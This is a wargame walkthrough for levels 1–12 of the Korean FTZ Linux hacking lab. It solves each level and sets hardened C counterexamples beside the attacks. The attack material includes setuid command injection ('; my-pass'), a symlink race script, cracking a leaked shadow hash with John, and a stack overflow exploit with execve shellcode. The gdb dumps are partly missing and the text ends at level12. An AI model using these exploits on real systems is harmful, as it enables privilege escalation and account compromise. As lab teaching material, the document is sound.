I played the Korean FTZ wargame; it felt great and was well worth learning from. I have written down the way I passed it.
It has been reviewed.
A few things to note:
1. Every user can see their own password with the my-pass command; this is the basis of passing a level.
That is, once the level(n) user obtains a shell as the level(n+1) user, running my-pass reveals the password of the level(n+1) user.
2. Each level's home directory contains a hint file, which is that level's prompt. Reading this hint is absolutely necessary.
Of course, the hints are written in Korean. I have translated them below, so you can follow this article while working through the exercises.
3. Don't misuse the shell you obtain; otherwise the whole domestic IP range may be blocked and nobody gets to play.
Now I will explain how to pass each level. If you cannot solve one, you can write to me at B_H_M_666@hotmail.com
Pass method:
************************************* Level1 *************************************
[level1@ftz level1]$ more hint
Find the file that is setuid to the level2 user.
[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null
/bin/excuteme
[level1@ftz level1]$ /bin/excuteme
Now you can run any command other than my-pass and chmod with level2 user permissions
[level2@ftz level2]$ /bin/bash        // then we simply spawn a level2 shell directly
[level2@ftz level2]$ my-pass
Level2 Password is "hacker or cracker".
Description:
1. Look at the hint file first at every level; this is essential.
2. The find command offers far more than the Windows search function: it can search by user, by permissions and by other attributes.
3. About 2>/dev/null: in *nix systems file descriptor 2 is standard error, so this part of the command means that any errors produced during the search are redirected to a sink file. Here is that file's information:
crw-rw-rw- 1 root root 1, 3 2003-01-30 /dev/null
************************************* Level2 *************************************
[level2@ftz level2]$ more hint
It is said that a certain file editor can also execute commands.
[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$ /usr/bin/editor
The familiar vim interface appears after this program is executed.
Now recall the three modes of vim and its various commands :P
Press ESC first, then type : and enter the command !my-pass
Then I saw the password of level3:
Level3 Password is "can you fly?".
Hit Enter or type command to continue
Description:
1. vim and other file editors are very powerful; as shown here, they can execute shell commands.
2. Because the editor binary is setuid to the level3 user, the commands executed inside this editor run with the level3 user's permissions, so you can get the password of level3.
************************************* Level3 *************************************
[level3@ftz level3]$ more hint
The following is the source code of autodig:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    char cmd[100];
    if (argc != 2) {
        printf("Auto Digger Version 0.9\n");
        printf("Usage: %s host\n", argv[0]);
        exit(0);
    }
    strcpy(cmd, "dig @");
    strcat(cmd, argv[1]);
    strcat(cmd, " version.bind chaos txt");
    system(cmd);
}
Use this to get the level4 permission.
More hints:
---- How to submit several arguments at once
[level3@ftz level3]$ find / -name autodig 2>/dev/null
/bin/autodig
[level3@ftz level3]$ /bin/autodig
Auto Digger Version 0.9
Usage: /bin/autodig host
[level3@ftz level3]$ /bin/autodig "; my-pass"
Level4 Password is "suck my brain".
[level3@ftz level3]$
Description:
1. From the source code you can see that the program passes its argument to the system() function without any checking; that is what produces the bug (one could of course also consider a buffer overflow here, but there is no need).
2. The argument is submitted inside double quotes, "...", and within it the ';' is the point where the shell splits the command.
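The defect is that the argument reaches system() unchecked. The following is an added example of my own (not code from the walkthrough or from FTZ) showing the hardened shape of the same program: the host is restricted to hostname characters and dig is started through execvp with a fixed argument vector, so no shell ever parses the input. The function names valid_host and run_dig are my own; the dig arguments mirror the ones in the hint.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only the characters a hostname may contain: letters, digits, '-' and '.'.
 * A shell metacharacter such as ';' or '`' is rejected before it goes anywhere. */
int valid_host(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* Run the same query as autodig, but without a shell: the argument vector is
 * handed straight to execvp, so the host is always one argument, whatever it
 * contains. Returns dig's exit status, or -1 if the host was rejected or the
 * child could not be started. */
int run_dig(const char *host)
{
    if (!valid_host(host))
        return -1;

    char server[256];                      /* "@" + host; host is at most 253 bytes */
    snprintf(server, sizeof server, "@%s", host);
    char *const args[] = { "dig", server, "version.bind", "chaos", "txt", NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(args[0], args);
        _exit(127);                        /* only reached if dig could not be executed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s host\n", argv[0]);
        return 1;
    }
    if (!valid_host(argv[1])) {
        fprintf(stderr, "refusing host argument: only letters, digits, '-' and '.' are allowed\n");
        return 1;
    }
    return run_dig(argv[1]) == 0 ? 0 : 1;
}
```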
************************************* Level4 *************************************
[level4@ftz level4]$ more hint
It is said that someone left a backdoor in /etc/xinetd.d/
[level4@ftz level4]$ more /etc/xinetd.d        (a mistake: I did not notice that it is a directory)
*** /etc/xinetd.d: directory ***
[level4@ftz level4]$ find / -user level5 -perm -4000 2>/dev/null
[level4@ftz level4]$ find /etc/xinetd.d/ -user level5 -perm -4000 2>/dev/null        (nothing again; this went even worse than the first try)
[level4@ftz level4]$ ll /etc/xinetd.d
total 52
-rw-r--r-- 1 root root 171 Mar 28 2003 backdoor
-rw-r--r-- 1 root root 295 Mar 28 2003 chargen
-rw-r--r-- 1 root root 315 Mar 28 2003 chargen-udp
-rw-r--r-- 1 root root 295 Mar 28 2003 daytime
-rw-r--r-- 1 root root 315 Mar 28 2003 daytime-udp
-rw-r--r-- 1 root root 287 Mar 28 2003 echo
-rw-r--r-- 1 root root 306 Mar 28 2003 echo-udp
-rw-r--r-- 1 root root 312 Mar 28 2003 servers
-rw-r--r-- 1 root root 310 Mar 28 2003 services
-rw-r--r-- 1 root root 406 Mar 28 2003 sgi_fam
-rw-r--r-- 1 root root 302 Mar 28 2003 telnet
-rw-r--r-- 1 root root 319 Mar 28 2003 time
-rw-r--r-- 1 root root 315 Mar 28 2003 time-udp
[level4@ftz level4]$ cd /etc/xinetd.d
[level4@ftz xinetd.d]$ cat backdoor
service finger
{
        disable = no
        flags = REUSE
        socket_type = stream
        wait = no
        user = level5
        server = /home/level4/tmp/backdoor
        log_on_failure += USERID
}
[level4@ftz xinetd.d]$ finger @localhost
^[[H^]
Level5 Password is "what is your name?".
[level4@ftz xinetd.d]$
Description:
1. The most important thing here is the configuration file /etc/xinetd.d/backdoor. You can see that it is a typical network service configuration:
service finger
{
        disable = no                         ; yes means the service is turned off, no means it is enabled
        flags = REUSE
        socket_type = stream
        wait = no
        user = level5                        ; the user whose permissions the server runs with
        server = /home/level4/tmp/backdoor   ; the program that provides the service, discussed below
        log_on_failure += USERID
}
2. Look at the server entry in backdoor and you will see it: there is one more step here, namely writing the file /home/level4/tmp/backdoor. Because someone else has already written this file, we skip that step. In fact it is very simple; the following is enough:
#!/bin/bash
my-pass
A simple script like this is OK: whenever the finger service is called, the configuration file makes xinetd run this script with the level5 user's permissions.
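What makes the backdoor stanza stand out is the combination of "user = level5" with a server path under /home, a file its owner can rewrite at will. The following is an added example of my own (not part of the walkthrough or of xinetd) that parses one such stanza and flags an enabled service whose server binary lies outside the system directories; the names parse_xinetd_service and service_is_suspicious, and the list of trusted prefixes, are my own assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <ctype.h>

struct xinetd_service { char name[64]; char user[64]; char server[256]; int disabled; };

/* Strip surrounding whitespace in place and return the start of the text. */
static char *trim(char *s)
{
    while (isspace((unsigned char)*s)) s++;
    char *end = s + strlen(s);
    while (end > s && isspace((unsigned char)end[-1])) *--end = '\0';
    return s;
}

/* Parse one "service name { key = value ... }" stanza into svc. Keys other than
 * user, server and disable are skipped. Returns 0, or -1 if no service line exists. */
int parse_xinetd_service(const char *text, struct xinetd_service *svc)
{
    char line[512];
    memset(svc, 0, sizeof *svc);
    while (*text) {
        size_t n = strcspn(text, "\n");
        if (n >= sizeof line) return -1;
        memcpy(line, text, n);
        line[n] = '\0';
        text += n + (text[n] == '\n');
        char *s = trim(line);
        if (strncmp(s, "service", 7) == 0 && isspace((unsigned char)s[7])) {
            snprintf(svc->name, sizeof svc->name, "%s", trim(s + 7));
            continue;
        }
        char *eq = strchr(s, '=');
        if (eq == NULL) continue;
        if (eq > s && (eq[-1] == '+' || eq[-1] == '-')) eq[-1] = ' ';   /* "+=" and "-=" forms */
        *eq = '\0';
        char *key = trim(s), *val = trim(eq + 1);
        if (strcasecmp(key, "user") == 0)
            snprintf(svc->user, sizeof svc->user, "%s", val);
        else if (strcasecmp(key, "server") == 0)
            snprintf(svc->server, sizeof svc->server, "%s", val);
        else if (strcasecmp(key, "disable") == 0)
            svc->disabled = (strcasecmp(val, "yes") == 0);
    }
    return svc->name[0] ? 0 : -1;
}

/* An enabled service whose server binary lives outside the system directories
 * is worth a look: a file under /home or /tmp can be rewritten by an ordinary
 * user, yet xinetd runs it as the account named by "user". */
int service_is_suspicious(const struct xinetd_service *svc)
{
    static const char *trusted[] = { "/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/" };
    if (svc->disabled || svc->server[0] == '\0') return 0;
    for (size_t i = 0; i < sizeof trusted / sizeof trusted[0]; i++)
        if (strncmp(svc->server, trusted[i], strlen(trusted[i])) == 0) return 0;
    return 1;
}
```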
************************************* Level5 *************************************
[level5@ftz level5]$ more hint
The program /usr/bin/level5 creates a temporary file named level5.tmp in the /tmp directory.
Use this to get the level6 permission.
Here you need to use the race condition principle. Every temporary file exists for some time between being created and being deleted; if you can get hold of the temporary file within that window, you can read its contents.
[bhm@b bhm]$ su
Password:
[root@b bhm]# cat > 1.txt
How to play h4x0r game
As root, write some text into 1.txt. Then, as the ordinary user bhm, we create a link to 1.txt:
[root@b bhm]# exit
exit
[bhm@b bhm]$ ln -s 1.txt 2.txt
[bhm@b bhm]$ ll 2.txt
lrwxrwxrwx 1 bhm bhm 5 Dec 6 01:30 2.txt -> 1.txt
[bhm@b bhm]$ more 2.txt
How to play h4x0r game
[bhm@b bhm]$
There is no doubt that 1.txt can be read this way. So the key question is how to link to the temporary file in that short instant. Doing it by hand is clearly unrealistic, so consider writing two programs: one is responsible for running /usr/bin/level5 repeatedly, and the other is dedicated to linking to this temporary file.
The programs are as follows:
[bhm@b f.t.z]$ more level5_1.c
#include <stdlib.h>
int main() {
    int i;
    for (i = 0; i < 100; i++) {
        system("/usr/bin/level5");
    }
}
[bhm@b f.t.z]$ more level5_2.c
#include <stdlib.h>
int main() {
    int i;
    system("touch level5.txt");
    for (i = 0; i < 100; i++) {
        system("ln -s /tmp/level5.tmp ./level5.txt");
    }
}
Run the two programs at the same time in two separate shells, and the password can be read from level5.txt. The password read is: what the hell
This one took me a long time to think about, and later I saw in the forum how someone passed it. I first tested it on my own machine and it worked, then tested it on FTZ.
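The weakness exploited here is a temporary file with a fixed, predictable name that another user can pre-link or swap during its lifetime. The following is an added example of my own (not part of the walkthrough or of FTZ) of how a setuid program should create such a file: mkstemp() with an unpredictable name and O_EXCL, a check on the descriptor actually obtained, and O_NOFOLLOW when an existing path must be opened. The names create_private_tmp and open_nofollow are my own.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Create a private temporary file from a template such as "/tmp/level5XXXXXX".
 * mkstemp() opens with O_CREAT|O_EXCL and mode 0600, so a link that another
 * user planted at that name makes the call fail instead of being followed,
 * and the random suffix makes the name hard to predict in the first place.
 * Returns an open descriptor, or -1; on success template holds the real name. */
int create_private_tmp(char *template)
{
    int fd = mkstemp(template);
    if (fd < 0)
        return -1;
    /* Verify the object actually opened, not the path: a regular file, owned
     * by us, mode 0600, with a single link. Anything else is discarded. */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || (st.st_mode & 0777) != 0600 || st.st_nlink != 1) {
        close(fd);
        unlink(template);
        return -1;
    }
    return fd;
}

/* Open an existing path read-only without following a symbolic link in the
 * final component. Returns -1 with errno == ELOOP when the path is a link. */
int open_nofollow(const char *path)
{
    return open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
}

int main(void)
{
    char name[] = "/tmp/level5XXXXXX";
    int fd = create_private_tmp(name);
    if (fd < 0) {
        perror("create_private_tmp");
        return 1;
    }
    /* All further writes go through the descriptor, not the name, so a later
     * swap of the path cannot redirect them. */
    dprintf(fd, "written through the descriptor only\n");
    printf("created %s (fd %d)\n", name, fd);
    close(fd);
    unlink(name);
    return 0;
}
```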
************************************* Level6 *************************************
login: level6
Password:
Last login: Thu Dec 4 16:31:40 from 61.255.11.117
hint: This is a hacking method often used on the menus of telnet-type BBSes.
Description:
1. At this point telnet hangs; no shell prompt appears.
2. Send a signal in the usual way with Ctrl+C, and the shell prompt appears, so you can continue.
[level6@ftz level6]$ ll
total 32
-rw-r--r-- 1 root root     72 Nov 22 2000 hint
-rw-r----- 1 root level6   36 Mar 24 2000 password
drwxr-xr-x 2 root level6 4096 Feb 23 2002 public_html
drwxrwxr-x 2 root level6 4096 Dec  4 16:32 tmp
-rwxr-x--- 1 root level6 14910 Mar 4 2003 tn
[level6@ftz level6]$ more hint
This is a hacking method often used on the menus of telnet-type BBSes. ----- still the same content!
[level6@ftz level6]$ more password
Level7 Password is "come together".
[level6@ftz level6]$
It's that simple; level6 passed.
************************************* Level7 *************************************
[level7@ftz level7]$ more hint
Executing the file /bin/level7 will ask you to enter a password:
1. The password is nearby ............
2. You need to use your imagination;
3. Can you convert a base-2 number into base-10?
4. You need to switch your calculator to scientific mode.
Description:
1. Isn't it short? Starting from this level there are more puzzle-style questions, programming questions and so on. Logical reasoning questions like this one (and, again, imagination) appear repeatedly in hacker competitions in Korea; it seems logical reasoning and imagination are among the basic qualities of a hacker.
2. After playing this level I found that my imagination is seriously lacking, but my observation is not. I found a piece of source code in the user directory, as follows:
#include <stdio.h>
int main()
{
    printf("\x6d\x61\x74\x65\n");
}
Compiled and run, it prints the password: mate
Run /bin/level7 and enter the password mate:
Congratulation! Next password is "break the world".
Of course, this is not the only way to pass this level; there is also a cooler method, hehe:
[level7@ftz level7]$ strings /bin/level7
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
printf
fgets
system
malloc
__deregister_frame_info
stdin
strncmp
exit
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
Insert The Password :
mate ======> this is the password we have to enter.
Congratulation! Next password is "break the world". =====> and this? Haha
cat /bin/wrong.txt =====> this is a further hint shown when the password is wrong. Of course, I didn't need it.
[level7@ftz level7]$
************************************* Level8 *************************************
First look at the hint again; its content is:
The shadow of level9 is hidden somewhere; the only thing known is its size, 1481.
Another application of find:
[level8@ftz level8]$ find / -size 1481c -print 2>/dev/null
/etc/rc.d/found.txt
/etc/log.d/scripts/services/afpd
/usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/javax/naming/event/NamingEvent.h
/usr/lib/python2.2/site-packages/Ft/Lib/Util.pyc
/usr/share/doc/ImageMagick-5.4.7/www/api/types/profileinfo.html
/usr/share/i18n/locales/de_BE@euro
/usr/share/i18n/locales/fr_BE@euro
/usr/share/locale/pl/LC_MESSAGES/gnome-pilot.mo
/usr/share/locale/eu/LC_MESSAGES/gtk20.mo
/usr/share/pixmaps/ooo_draw.png
/usr/share/man/man3/curs_inch.3x.gz
/usr/share/vim/vim61/syntax/abaqus.vim
/usr/share/ImageMagick/www/api/types/profileinfo.html
/usr/share/foomatic/db/source/driver/djet500.xml
/usr/share/foomatic/db/source/printer/72736.xml
/usr/src/linux-2.4.20-8/drivers/addon/iscsi/md5.h
/usr/src/linux-2.4.20-8/drivers/i2c/Makefile
/usr/src/linux-2.4.20-8/include/asm-sparc/pbm.h
/usr/src/linux-2.4.23/include/asm-sparc/pbm.h
/usr/src/linux-2.4.25/include/asm-sparc/pbm.h
/usr/src/linux-2.4.24/include/asm-sparc/pbm.h
The search found a lot of files; first look at the first one.
[level8@ftz level8]$ more /etc/rc.d/found.txt
level9:$1$VKY6SSLG$6RYUXTNMEVGSFY7XF0WPS.:11040:0:99999:7:-1:-1:134549524
Oh ~~ so it turns out that after find we need John.
John, like nmap, is a very classic hacker tool; the impact it had in its day was no less than that of SATAN. For specific usage, see its help.
Go back to my own machine and start cracking:
[bhm@b run]$ ls
all.chr     john.ini   lanman.chr  password.lst  unshadow
alpha.chr   john       john.log    level9.pwd    unafs
digits.chr  john.conf  john.pot    mailer        unique
[bhm@b run]$ john -w:password.lst level9.pwd
Loaded 1 password hash (FreeBSD MD5 [32/32])
apple            (level9)
guesses: 1  time: 0:00:00:00 100%  c/s: 1450  trying: apple
The crack finishes quickly; the password is apple ~~!
Level8 was that easy.
************************************* Level9 *************************************
Keep going, stay healthy ~~ oh oh
login: level9
Password:
Last login: Tue Apr 20 19:10:03 from 210.124.214.129
[level9@ftz level9]$ more hint
The following is the source code of /usr/bin/bof. Use this code to get the password of level10:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main() {
    char buf2[10];
    char buf[10];
    printf("It can be overflow: ");
    fgets(buf, 40, stdin);
    if (strncmp(buf2, "go", 2) == 0)
    {
        printf("Good Skill!\n");
        setreuid(3010, 3010);
        system("/bin/bash");
    }
}
You can tell without thinking that uid 3010 is level10.
This one is more troublesome; we can only analyze it. Bring out gdb and start the analysis.
gdb is the debugging tool that ships with the Linux system; it is powerful, and its usage is in the online manual.
The analysis looks at the following critical parts of the code:
1. Start section
(gdb) disass main
Dump of assembler code for function main:
0x08048420 ...
0x08048423 ...
0x08048426 ...
..............................
2. Problem section: the stack
0x08048454 ...        ; 0xbffff880 is the place where the argument for strncmp is stored
0x08048457 ...
0x0804845a ...
0x0804845c ...        ; the string "go" is pushed into the stack area
0x08048461 ...        ; the contents of 0xbffff880 are loaded into eax
0x08048464 ...
0x08048465 ...        ; the two arguments are compared; if they are equal, eax is set to zero
0x0804846a ...
0x0804846d ...
0x0804846f ...        ; test whether eax is zero: if so, execution continues; otherwise jump to 0x080484a0
0x08048471 ...
0x08048474 ...
(The instruction mnemonics were not preserved in this copy of the article; only the addresses and my notes survive.)
It can be seen that if we make the data at 0xbffff880 equal to "go", we pass the check.
So how do we make the data at 0xbffff880 become "go"?
Start the dynamic analysis:
Set breakpoints at 0x08048454 and 0x08048465, and run
(gdb) b *0x08048454
Breakpoint 1 at 0x8048454: file level9.c, line 11.
(gdb) b *0x08048465
Breakpoint 2 at 0x8048465: file level9.c, line 13.
(gdb) r
Starting program: /home/bhm/myprogarm/test/f.t.z/level9
It can be overflow: aaaaaaaaa        // any input will do
Breakpoint 1, 0x08048454 in main () at level9.c:11
11          fgets(buf, 40, stdin);
Then check the contents of the registers:
(gdb) i reg
................................
Because esp is the top of the stack, examine the stack area:
(gdb) x/32 $esp-16
.................................
It can be seen that the string is stored in the stack area starting at 0xbffff870, because 0x61616161 ("aaaa") begins there.
Calculate 0xbffff880 - 0xbffff870 = 0x10 = 16
That is to say, enter 16 "a" characters followed by the string "go"; you can verify this by testing.
Let's try it *^*^*
[bhm@b f.t.z]$ ./level9
It can be overflow: aaaaaaaaaaaaaaaago
Good Skill!
[bhm@b f.t.z]$ ps
  PID TTY          TIME CMD
 2787 pts/0    00:00:00 bash
 2818 pts/0    00:00:18 fcitx
14279 pts/0    00:00:00 level9
14280 pts/0    00:00:00 bash
14310 pts/0    00:00:00 ps
[bhm@b f.t.z]$
Because the new bash is not obvious on my machine, look closely at the process list: PID 14280 is the bash that level9 spawned.
We got the shell ^_*
The resulting password is "interesting to hack!"
************************************* Level10 *************************************
Keep going, haha
login: level10
Password:
Last login: Tue Apr 20 14:24:21 from 220.122.59.34
[level10@ftz level10]$ more hint
Right now two users are chatting in a chat room. This chat room uses shared memory; the key_t value is 7530, and the conversation is stored in a variable named text. Use this to eavesdrop on the two people's conversation and get the password of level11.
It looks like this level tests programming, but it is a bit simple:
1. Look up the shared memory functions;
2. Discover that the shmget and shmat functions can be used;
3. Use your own system's manual to look up their specific usage (you can view them with info <function name>).
Then write the program:
#include <stdio.h>
#include <stdlib.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int main(void)
{
    int shmid;
    char *memptr;
    if ((shmid = shmget((key_t)7530, 512, IPC_CREAT | 0666)) < 0)
    {
        printf("shmget() function error.\n");
        exit(1);
    }
    if ((memptr = shmat(shmid, 0, 0)) == (char *)-1)
    {
        printf("shmat() function error.\n");
        exit(1);
    }
    printf("%s\n", memptr);
    return 0;
}
Compile and run:
[level10@ftz tmp]$ ./a.out
mengmeng: what is the password of level11?
guta: Yes!@#$?
mengmeng and guta are two system administrators :P The password is very complicated; moving on ~~
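What made the chat readable is the segment's permission bits: a segment created with 0666 can be attached by any local user, which is exactly what the program above relies on. The following is an added example of my own (not part of the walkthrough or of FTZ) that creates a segment with owner-only permissions instead and shows how to inspect an existing segment's mode with shmctl(IPC_STAT), so an administrator can spot world-readable segments. The names create_segment, segment_readable_by_others and read_segment_text are my own.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/stat.h>

/* Create (or reuse) the segment behind key with the given permission bits.
 * Returns the shmid, or -1. */
int create_segment(key_t key, size_t size, int mode)
{
    return shmget(key, size, IPC_CREAT | (mode & 0777));
}

/* Return 1 if a user other than the owner can read the segment (group or
 * world read bit set), 0 if it is private, -1 if it cannot be inspected. */
int segment_readable_by_others(int shmid)
{
    struct shmid_ds ds;
    if (shmctl(shmid, IPC_STAT, &ds) < 0)
        return -1;
    return (ds.shm_perm.mode & (S_IRGRP | S_IROTH)) ? 1 : 0;
}

/* Copy the text held in the segment into out (at most outlen-1 bytes, always
 * NUL-terminated). Returns the number of bytes copied, or -1. */
long read_segment_text(int shmid, char *out, size_t outlen)
{
    if (outlen == 0)
        return -1;
    char *mem = shmat(shmid, NULL, SHM_RDONLY);
    if (mem == (char *)-1)
        return -1;
    size_t n = strnlen(mem, outlen - 1);
    memcpy(out, mem, n);
    out[n] = '\0';
    shmdt(mem);
    return (long)n;
}

int main(void)
{
    /* Same key as the chat room in the hint, but created with 0600: only the
     * owner can attach, so another user's reader fails at shmget with EACCES. */
    int shmid = create_segment((key_t)7530, 512, 0600);
    if (shmid < 0) {
        perror("shmget");
        return 1;
    }
    printf("segment %d readable by others: %d\n", shmid, segment_readable_by_others(shmid));
    shmctl(shmid, IPC_RMID, NULL);
    return 0;
}
```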
************************************* Level11 *************************************
login: level11
Password:
Last login: Wed Apr 21 00:11:07 from 220.73.26.23
[level11@ftz level11]$ more hint
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
    char str[256];
    setreuid(3092, 3092);
    strcpy(str, argv[1]);
    printf(str);
}
[level11@ftz level11]$
No need to think about it; time to overflow, sigh.
I used a technique introduced by oyxin; the specific article explains it:
http://www.xfocus.net/articles/200305/531.html
So I won't waste words on it.
Here is my source code; it is basically the same as oyxin's code, because overflow programs all follow the same template.
[bhm@b f.t.z]$ more attack11.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 264   // the number of bytes the system allocated for the vulnerable program's buffer
char shell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
               "\x68\x2f\x62\x69\x6e\x89\xe3\x89"
               "\x64\x24\x0c\x89\x44\x24\x10\x8d"
               "\x4c\x24\x0c\x8b\x54\x24\x08\xb0"
               "\x0b\xcd\x80";
int main(void)
{
    char buf[BUFSIZE + 12];
    char *prog[] = {"../attackme", buf, NULL};                 // path of the vulnerable program
    char *env[] = {"HOME=/home/level11/tmp", shell, NULL};     // the directory the exploit is run from
    unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) - strlen(shell) - 0x02;
    memset(buf, 0x41, sizeof(buf));
    memcpy(buf + BUFSIZE + 4, (char *)&ret, 4);
    buf[BUFSIZE + 8] = 0x00;
    execve(prog[0], prog, env);
    return 0;
}
[bhm@b f.t.z]$
[level11@ftz tmp]$ gdb ../attackme -q
(gdb) disass main
Dump of assembler code for function main:
0x08048470 ...
0x08048471 ...
0x08048473 ...
0x08048479 ...
0x0804847c ...
0x08048481 ...
...............................................
[level11@ftz tmp]$ dir ../
attackme hint public_html tmp ====> the vulnerable program is attackme
[level11@ftz tmp]$ pwd
/home/level11/tmp ====> the location the exploit is run from
[level11@ftz tmp]$ ../attackme `perl -e 'print "a"x267'`
With 267 'a' characters there is no segmentation fault yet.
[level11@ftz tmp]$ ../attackme `perl -e 'print "a"x268'`
Now the fault appears: the 4 bytes beyond the 264 bytes allocated in memory are the saved ebp, and at 268 bytes the copy starts overwriting eip.
Now compile the program and test:
[level11@ftz tmp]$ gcc b.c
[level11@ftz tmp]$ ./a.out
sh-2.05b$ my-pass
TERM environment variable not set.
Level12 Password is "it is like this".
sh-2.05b$
I'm in :P Thanks to oyxin's good stuff.
************************************* Level12 *************************************
login: level12
Password:
Last login: Wed Jul 7 15:34:51 from 211.194.178.186
[level12@ftz level12]$ more hint
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    char str[256];
    setreuid(3093, 3093);
    printf("Please enter a string.\n");
    gets(str);
    printf("%s\n", str);
}
[level12@ftz level12]$
gets() overflow!
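Level9, level11 and level12 share one root cause: input is written into a stack buffer without regard to its size (fgets with 40 into a 10-byte buffer, gets() with no bound at all), and level11 additionally hands the user's text to printf as the format string. The following is an added example of my own (not code from the walkthrough or from FTZ) of the fixed shape: a line reader bounded by the buffer it writes to, which also drains an over-long line so the excess cannot land in the next read, and an echo that passes the text to "%s" as data. The names read_line_bounded and echo_line are my own.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <limits.h>

/* Read one line from in into dst, writing at most cap bytes including the
 * terminator. If the line is longer than cap-1 characters, the excess is
 * consumed and discarded so it neither overflows dst nor leaks into the next
 * read. Returns the number of characters stored, or -1 at end of input. */
long read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || cap > INT_MAX || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';               /* whole line fit: drop the newline */
    } else {
        int c;                         /* line was cut: drain the rest of it */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

/* The level12 echo with the bugs of its neighbours fixed: gets() is replaced
 * by a read bounded by sizeof str, and the text goes to "%s" as an argument
 * rather than being used as the format string the way level11's printf(str)
 * does. Returns the length of the line echoed, or -1 at end of input. */
long echo_line(FILE *in, FILE *out)
{
    char str[256];
    long n = read_line_bounded(str, sizeof str, in);
    if (n < 0)
        return -1;
    fprintf(out, "%s\n", str);
    return n;
}

int main(void)
{
    printf("Please enter a string.\n");
    return echo_line(stdin, stdout) < 0 ? 1 : 0;
}
```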